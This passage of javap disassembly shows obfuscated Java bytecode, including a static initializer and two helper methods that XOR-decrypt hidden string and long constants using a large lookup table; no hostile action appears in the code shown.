       250: goto          280
       253: bipush        20
       255: goto          280
       258: bipush        6
       260: goto          280
       263: bipush        123
       265: goto          280
       268: bipush        28
       270: goto          280
       273: bipush        92
       275: goto          280
       278: bipush        123
       280: ixor
       281: i2c
       282: castore
       283: iinc          14, 1
       286: swap
       287: dup_x1
       288: ifne          296
       291: dup2
       292: swap
       293: goto          203
       296: swap
       297: dup_x1
       298: iload         14
       300: if_icmpgt     200
       303: new           #270                // class java/lang/String
       306: dup_x1
       307: swap
       308: invokespecial #305                // Method java/lang/String."<init>":([C)V
       311: invokevirtual #77                 // Method java/lang/String.intern:()Ljava/lang/String;
       314: swap
       315: pop
       316: swap
       317: tableswitch   { // 0 to 0
                       0: 120
                 default: 50
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #5                  // String RäçîU/Y43*9\u0006J¬¹ \u0012\u0088¦Ëå\'\u00046
       345: dup
       346: astore_2
       347: invokevirtual #317                // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #203                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #18                 // String ISO-8859-1
       364: invokevirtual #226                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #368                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #368                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #368                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #368                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #368                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #368                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #368                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #368                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #38                 // Field c:[J
       492: iconst_3
       493: anewarray     #304                // class java/lang/Long
       496: putstatic     #314                // Field d:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         6
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        19541
         6: ixor
         7: ldc           #19                 // int 65535
         9: iand
        10: istore_3
        11: getstatic     #228                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #183                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #146                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1078
                       2: 1083
                       3: 1088
                       4: 1093
                       5: 1099
                       6: 1104
                       7: 1109
                       8: 1114
                       9: 1119
                      10: 1124
                      11: 1129
                      12: 1135
                      13: 1141
                      14: 1146
                      15: 1152
                      16: 1157
                      17: 1163
                      18: 1168
                      19: 1173
                      20: 1178
                      21: 1183
                      22: 1188
                      23: 1192
                      24: 1198
                      25: 1204
                      26: 1209
                      27: 1215
                      28: 1219
                      29: 1224
                      30: 1229
                      31: 1234
                      32: 1239
                      33: 1245
                      34: 1251
                      35: 1256
                      36: 1262
                      37: 1268
                      38: 1272
                      39: 1278
                      40: 1284
                      41: 1289
                      42: 1294
                      43: 1300
                      44: 1306
                      45: 1311
                      46: 1316
                      47: 1322
                      48: 1328
                      49: 1334
                      50: 1339
                      51: 1345
                      52: 1351
                      53: 1357
                      54: 1363
                      55: 1369
                      56: 1374
                      57: 1380
                      58: 1385
                      59: 1390
                      60: 1395
                      61: 1400
                      62: 1406
                      63: 1411
                      64: 1416
                      65: 1422
                      66: 1427
                      67: 1433
                      68: 1438
                      69: 1444
                      70: 1450
                      71: 1456
                      72: 1462
                      73: 1467
                      74: 1472
                      75: 1477
                      76: 1483
                      77: 1488
                      78: 1494
                      79: 1500
                      80: 1505
                      81: 1510
                      82: 1516
                      83: 1521
                      84: 1525
                      85: 1530
                      86: 1536
                      87: 1542
                      88: 1548
                      89: 1553
                      90: 1557
                      91: 1563
                      92: 1569
                      93: 1575
                      94: 1580
                      95: 1585
                      96: 1590
                      97: 1596
                      98: 1601
                      99: 1607
                     100: 1612
                     101: 1618
                     102: 1623
                     103: 1629
                     104: 1635
                     105: 1640
                     106: 1645
                     107: 1650
                     108: 1655
                     109: 1660
                     110: 1665
                     111: 1670
                     112: 1675
                     113: 1681
                     114: 1687
                     115: 1693
                     116: 1698
                     117: 1704
                     118: 1710
                     119: 1715
                     120: 1720
                     121: 1726
                     122: 1731
                     123: 1737
                     124: 1742
                     125: 1748
                     126: 1753
                     127: 1759
                     128: 1765
                     129: 1770
                     130: 1776
                     131: 1782
                     132: 1788
                     133: 1793
                     134: 1798
                     135: 1803
                     136: 1808
                     137: 1813
                     138: 1819
                     139: 1824
                     140: 1829
                     141: 1835
                     142: 1841
                     143: 1846
                     144: 1851
                     145: 1856
                     146: 1862
                     147: 1867
                     148: 1873
                     149: 1879
                     150: 1884
                     151: 1890
                     152: 1895
                     153: 1901
                     154: 1907
                     155: 1913
                     156: 1918
                     157: 1924
                     158: 1930
                     159: 1935
                     160: 1941
                     161: 1946
                     162: 1951
                     163: 1957
                     164: 1963
                     165: 1969
                     166: 1974
                     167: 1980
                     168: 1985
                     169: 1990
                     170: 1995
                     171: 2000
                     172: 2006
                     173: 2012
                     174: 2018
                     175: 2023
                     176: 2029
                     177: 2035
                     178: 2041
                     179: 2046
                     180: 2052
                     181: 2058
                     182: 2063
                     183: 2068
                     184: 2074
                     185: 2079
                     186: 2085
                     187: 2090
                     188: 2095
                     189: 2101
                     190: 2107
                     191: 2112
                     192: 2117
                     193: 2123
                     194: 2129
                     195: 2134
                     196: 2140
                     197: 2146
                     198: 2151
                     199: 2156
                     200: 2161
                     201: 2167
                     202: 2173
                     203: 2178
                     204: 2183
                     205: 2189
                     206: 2195
                     207: 2201
                     208: 2207
                     209: 2212
                     210: 2218
                     211: 2224
                     212: 2229
                     213: 2234
                     214: 2239
                     215: 2245
                     216: 2249
                     217: 2255
                     218: 2261
                     219: 2267
                     220: 2273
                     221: 2279
                     222: 2284
                     223: 2290
                     224: 2296
                     225: 2301
                     226: 2307
                     227: 2313
                     228: 2319
                     229: 2324
                     230: 2329
                     231: 2335
                     232: 2341
                     233: 2346
                     234: 2352
                     235: 2357
                     236: 2363
                     237: 2368
                     238: 2374
                     239: 2380
                     240: 2386
                     241: 2391
                     242: 2396
                     243: 2401
                     244: 2407
                     245: 2413
                     246: 2418
                     247: 2424
                     248: 2430
                     249: 2435
                     250: 2441
                     251: 2447
                     252: 2452
                     253: 2457
                     254: 2462
                 default: 2468
            }
      1072: sipush        252
      1075: goto          2471
      1078: bipush        72
      1080: goto          2471
      1083: bipush        124
      1085: goto          2471
      1088: bipush        98
      1090: goto          2471
      1093: sipush        157
      1096: goto          2471
      1099: bipush        112
      1101: goto          2471
      1104: bipush        49
      1106: goto          2471
      1109: bipush        35
      1111: goto          2471
      1114: bipush        121
      1116: goto          2471
      1119: bipush        78
      1121: goto          2471
      1124: bipush        57
      1126: goto          2471
      1129: sipush        224
      1132: goto          2471
      1135: sipush        237
      1138: goto          2471
      1141: bipush        32
      1143: goto          2471
      1146: sipush        138
      1149: goto          2471
      1152: bipush        60
      1154: goto          2471
      1157: sipush        130
      1160: goto          2471
      1163: bipush        64
      1165: goto          2471
      1168: bipush        120
      1170: goto          2471
      1173: bipush        42
      1175: goto          2471
      1178: bipush        7
      1180: goto          2471
      1183: bipush        16
      1185: goto          2471
      1188: iconst_4
      1189: goto          2471
      1192: sipush        129
      1195: goto          2471
      1198: sipush        235
      1201: goto          2471
      1204: bipush        44
      1206: goto          2471
      1209: sipush        245
      1212: goto          2471
      1215: iconst_5
      1216: goto          2471
      1219: bipush        61
      1221: goto          2471
      1224: bipush        45
      1226: goto          2471
      1229: bipush        107
      1231: goto          2471
      1234: bipush        13
      1236: goto          2471
      1239: sipush        153
      1242: goto          2471
      1245: sipush        244
      1248: goto          2471
      1251: bipush        70
      1253: goto          2471
      1256: sipush        164
      1259: goto          2471
      1262: sipush        131
      1265: goto          2471
      1268: iconst_3
      1269: goto          2471
      1272: sipush        176
      1275: goto          2471
      1278: sipush        167
      1281: goto          2471
      1284: bipush        48
      1286: goto          2471
      1289: bipush        43
      1291: goto          2471
      1294: sipush        146
      1297: goto          2471
      1300: sipush        163
      1303: goto          2471
      1306: bipush        55
      1308: goto          2471
      1311: bipush        12
      1313: goto          2471
      1316: sipush        187
      1319: goto          2471
      1322: sipush        247
      1325: goto          2471
      1328: sipush        231
      1331: goto          2471
      1334: bipush        86
      1336: goto          2471
      1339: sipush        170
      1342: goto          2471
      1345: sipush        210
      1348: goto          2471
      1351: sipush        180
      1354: goto          2471
      1357: sipush        222
      1360: goto          2471
      1363: sipush        128
      1366: goto          2471
      1369: bipush        92
      1371: goto          2471
      1374: sipush        211
      1377: goto          2471
      1380: bipush        111
      1382: goto          2471
      1385: bipush        11
      1387: goto          2471
      1390: bipush        89
      1392: goto          2471
      1395: bipush        68
      1397: goto          2471
      1400: sipush        151
      1403: goto          2471
      1406: bipush        83
      1408: goto          2471
      1411: bipush        114
      1413: goto          2471
      1416: sipush        208
      1419: goto          2471
      1422: bipush        34
      1424: goto          2471
      1427: sipush        141
      1430: goto          2471
      1433: bipush        33
      1435: goto          2471
      1438: sipush        253
      1441: goto          2471
      1444: sipush        243
      1447: goto          2471
      1450: sipush        205
      1453: goto          2471
      1456: sipush        230
      1459: goto          2471
      1462: bipush        56
      1464: goto          2471
      1467: bipush        103
      1469: goto          2471
      1472: bipush        27
      1474: goto          2471
      1477: sipush        165
      1480: goto          2471
      1483: bipush        30
      1485: goto          2471
      1488: sipush        184
      1491: goto          2471
      1494: sipush        178
      1497: goto          2471
      1500: bipush        123
      1502: goto          2471
      1505: bipush        119
      1507: goto          2471
      1510: sipush        216
      1513: goto          2471
      1516: bipush        69
      1518: goto          2471
      1521: iconst_1
      1522: goto          2471
      1525: bipush        66
      1527: goto          2471
      1530: sipush        136
      1533: goto          2471
      1536: sipush        145
      1539: goto          2471
      1542: sipush        204
      1545: goto          2471
      1548: bipush        106
      1550: goto          2471
      1553: iconst_0
      1554: goto          2471
      1557: sipush        220
      1560: goto          2471
      1563: sipush        196
      1566: goto          2471
      1569: sipush        213
      1572: goto          2471
      1575: bipush        50
      1577: goto          2471
      1580: bipush        113
      1582: goto          2471
      1585: bipush        102
      1587: goto          2471
      1590: sipush        232
      1593: goto          2471
      1596: bipush        87
      1598: goto          2471
      1601: sipush        202
      1604: goto          2471
      1607: bipush        24
      1609: goto          2471
      1612: sipush        134
      1615: goto          2471
      1618: bipush        110
      1620: goto          2471
      1623: sipush        181
      1626: goto          2471
      1629: sipush        186
      1632: goto          2471
      1635: bipush        17
      1637: goto          2471
      1640: bipush        62
      1642: goto          2471
      1645: bipush        14
      1647: goto          2471
      1650: bipush        51
      1652: goto          2471
      1655: bipush        125
      1657: goto          2471
      1660: bipush        65
      1662: goto          2471
      1665: bipush        58
      1667: goto          2471
      1670: bipush        77
      1672: goto          2471
      1675: sipush        226
      1678: goto          2471
      1681: sipush        239
      1684: goto          2471
      1687: sipush        150
      1690: goto          2471
      1693: bipush        74
      1695: goto          2471
      1698: sipush        179
      1701: goto          2471
      1704: sipush        148
      1707: goto          2471
      1710: bipush        52
      1712: goto          2471
      1715: bipush        122
      1717: goto          2471
      1720: sipush        250
      1723: goto          2471
      1726: bipush        94
      1728: goto          2471
      1731: sipush        214
      1734: goto          2471
      1737: bipush        118
      1739: goto          2471
      1742: sipush        195
      1745: goto          2471
      1748: bipush        104
      1750: goto          2471
      1753: sipush        209
      1756: goto          2471
      1759: sipush        228
      1762: goto          2471
      1765: bipush        93
      1767: goto          2471
      1770: sipush        133
      1773: goto          2471
      1776: sipush        152
      1779: goto          2471
      1782: sipush        154
      1785: goto          2471
      1788: bipush        115
      1790: goto          2471
      1793: bipush        82
      1795: goto          2471
      1798: bipush        8
      1800: goto          2471
      1803: bipush        109
      1805: goto          2471
      1808: bipush        75
      1810: goto          2471
      1813: sipush        241
      1816: goto          2471
      1819: bipush        76
      1821: goto          2471
      1824: bipush        84
      1826: goto          2471
      1829: sipush        183
      1832: goto          2471
      1835: sipush        189
      1838: goto          2471
      1841: bipush        41
      1843: goto          2471
      1846: bipush        90
      1848: goto          2471
      1851: bipush        88
      1853: goto          2471
      1856: sipush        206
      1859: goto          2471
      1862: bipush        71
      1864: goto          2471
      1867: sipush        227
      1870: goto          2471
      1873: sipush        143
      1876: goto          2471
      1879: bipush        40
      1881: goto          2471
      1884: sipush        161
      1887: goto          2471
      1890: bipush        95
      1892: goto          2471
      1895: sipush        169
      1898: goto          2471
      1901: sipush        142
      1904: goto          2471
      1907: sipush        191
      1910: goto          2471
      1913: bipush        59
      1915: goto          2471
      1918: sipush        182
      1921: goto          2471
      1924: sipush        177
      1927: goto          2471
      1930: bipush        10
      1932: goto          2471
      1935: sipush        201
      1938: goto          2471
      1941: bipush        6
      1943: goto          2471
      1946: bipush        25
      1948: goto          2471
      1951: sipush        139
      1954: goto          2471
      1957: sipush        207
      1960: goto          2471
      1963: sipush        190
      1966: goto          2471
      1969: bipush        38
      1971: goto          2471
      1974: sipush        166
      1977: goto          2471
      1980: bipush        105
      1982: goto          2471
      1985: bipush        97
      1987: goto          2471
      1990: bipush        39
      1992: goto          2471
      1995: bipush        21
      1997: goto          2471
      2000: sipush        155
      2003: goto          2471
      2006: sipush        144
      2009: goto          2471
      2012: sipush        135
      2015: goto          2471
      2018: bipush        46
      2020: goto          2471
      2023: sipush        242
      2026: goto          2471
      2029: sipush        188
      2032: goto          2471
      2035: sipush        233
      2038: goto          2471
      2041: bipush        116
      2043: goto          2471
      2046: sipush        132
      2049: goto          2471
      2052: sipush        185
      2055: goto          2471
      2058: bipush        80
      2060: goto          2471
      2063: bipush        126
      2065: goto          2471
      2068: sipush        156
      2071: goto          2471
      2074: bipush        19
      2076: goto          2471
      2079: sipush        217
      2082: goto          2471
      2085: bipush        91
      2087: goto          2471
      2090: bipush        99
      2092: goto          2471
      2095: sipush        174
      2098: goto          2471
      2101: sipush        158
      2104: goto          2471
      2107: bipush        73
      2109: goto          2471
      2112: bipush        96
      2114: goto          2471
      2117: sipush        162
      2120: goto          2471
      2123: sipush        168
      2126: goto          2471
      2129: bipush        79
      2131: goto          2471
      2134: sipush        194
      2137: goto          2471
      2140: sipush        147
      2143: goto          2471
      2146: bipush        31
      2148: goto          2471
      2151: bipush        47
      2153: goto          2471
      2156: bipush        18
      2158: goto          2471
      2161: sipush        240
      2164: goto          2471
      2167: sipush        246
      2170: goto          2471
      2173: bipush        100
      2175: goto          2471
      2178: bipush        127
      2180: goto          2471
      2183: sipush        225
      2186: goto          2471
      2189: sipush        203
      2192: goto          2471
      2195: sipush        251
      2198: goto          2471
      2201: sipush        249
      2204: goto          2471
      2207: bipush        101
      2209: goto          2471
      2212: sipush        197
      2215: goto          2471
      2218: sipush        223
      2221: goto          2471
      2224: bipush        117
      2226: goto          2471
      2229: bipush        23
      2231: goto          2471
      2234: bipush        81
      2236: goto          2471
      2239: sipush        173
      2242: goto          2471
      2245: iconst_2
      2246: goto          2471
      2249: sipush        171
      2252: goto          2471
      2255: sipush        200
      2258: goto          2471
      2261: sipush        199
      2264: goto          2471
      2267: sipush        172
      2270: goto          2471
      2273: sipush        229
      2276: goto          2471
      2279: bipush        29
      2281: goto          2471
      2284: sipush        234
      2287: goto          2471
      2290: sipush        255
      2293: goto          2471
      2296: bipush        15
      2298: goto          2471
      2301: sipush        248
      2304: goto          2471
      2307: sipush        215
      2310: goto          2471
      2313: sipush        160
      2316: goto          2471
      2319: bipush        67
      2321: goto          2471
      2324: bipush        63
      2326: goto          2471
      2329: sipush        218
      2332: goto          2471
      2335: sipush        175
      2338: goto          2471
      2341: bipush        85
      2343: goto          2471
      2346: sipush        219
      2349: goto          2471
      2352: bipush        53
      2354: goto          2471
      2357: sipush        140
      2360: goto          2471
      2363: bipush        20
      2365: goto          2471
      2368: sipush        198
      2371: goto          2471
      2374: sipush        159
      2377: goto          2471
      2380: sipush        149
      2383: goto          2471
      2386: bipush        54
      2388: goto          2471
      2391: bipush        36
      2393: goto          2471
      2396: bipush        9
      2398: goto          2471
      2401: sipush        192
      2404: goto          2471
      2407: sipush        238
      2410: goto          2471
      2413: bipush        108
      2415: goto          2471
      2418: sipush        221
      2421: goto          2471
      2424: sipush        137
      2427: goto          2471
      2430: bipush        22
      2432: goto          2471
      2435: sipush        193
      2438: goto          2471
      2441: sipush        236
      2444: goto          2471
      2447: bipush        26
      2449: goto          2471
      2452: bipush        37
      2454: goto          2471
      2457: bipush        28
      2459: goto          2471
      2462: sipush        212
      2465: goto          2471
      2468: sipush        254
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #19                 // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #228                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #270                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #305                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #77                 // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #228                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        10103
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #314                // Field d:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #314                // Field d:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #38                 // Field c:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #116                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #314                // Field d:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #80                 // Method java/lang/Long.longValue:()J
        44: lreturn
}
